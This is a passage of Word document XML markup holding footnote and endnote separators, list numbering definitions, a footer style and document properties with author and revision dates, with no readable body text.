  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2803B957" w14:textId="77777777" w:rsidR="008B63F3" w:rsidRDefault="008B63F3" w:rsidP="00073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80369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33433C" w14:textId="4445B91A" w:rsidR="00073FAE" w:rsidRDefault="00073F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213528" w14:textId="77777777" w:rsidR="00073FAE" w:rsidRDefault="00073F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13EFB" w14:textId="77777777" w:rsidR="008B63F3" w:rsidRDefault="008B63F3" w:rsidP="00073FAE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22B468D1" w14:textId="77777777" w:rsidR="008B63F3" w:rsidRDefault="008B63F3" w:rsidP="00073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849"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D31A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06AB7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A76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F5AC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="917E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D0DDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEF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F7B56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9A8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156D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="350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14A2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C12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C27FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC7A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76D10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7F2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468FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F8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32316"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="748E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80695"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FB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A5B17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3A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A3D2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C28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73490"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C0C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3783D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B8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41E06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D0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4242B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="842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B2A61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08BE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36848"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BF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C0990"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD6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A41437"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D7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70D65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37E8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A3CCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AB4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A0523"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A9A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4D53F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="252E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A3DF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD90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F3CC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F08A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26A51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07C8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35448C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D80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29646F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8552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50702"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="075E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7E4A4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C73E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01367"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36D6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60027"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B9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BE6F53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A3A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C6BE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16EA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C378EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF0C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412AF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="278C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274C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4808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9208D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FED6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569B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80F8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905E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8122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35066D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D8A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80573F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C584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861585">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="966467260">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1270939947">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="68885696">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="167911045">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1698582787">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1695575521">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1767581416">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1662467460">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="568883199">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1342397415">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="149567851">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1491214642">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1304311403">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1565488645">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1914006682">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2146314761">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1876236550">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="32115562">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1568879769">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="810824748">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="56831254">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="100494065">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1030447582">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="2147159802">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="675881254">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1916741174">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1367026454">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="74477734">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1028723757">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="54133252">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1988128643">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1655795543">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1448695118">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="153183157">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1965765339">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1107431593">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="610086127">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1324889701">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1514152218">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1272282201">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="711148247">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1808745215">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1428039326">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="20032712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51"/>
    <w:rsid w:val="00073FAE"/>
    <w:rsid w:val="00091BDA"/>
    <w:rsid w:val="00497451"/>
    <w:rsid w:val="00731DC7"/>
    <w:rsid w:val="008B63F3"/>
    <w:rsid w:val="008E45D5"/>
    <w:rsid w:val="00EA4463"/>
    <w:rsid w:val="00EC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EBA8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{527BDFC8-7331-4CBF-8554-698BF86A4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4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3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FAE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00073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Repaka</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prakash Repaka</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-26T14:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-26T14:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>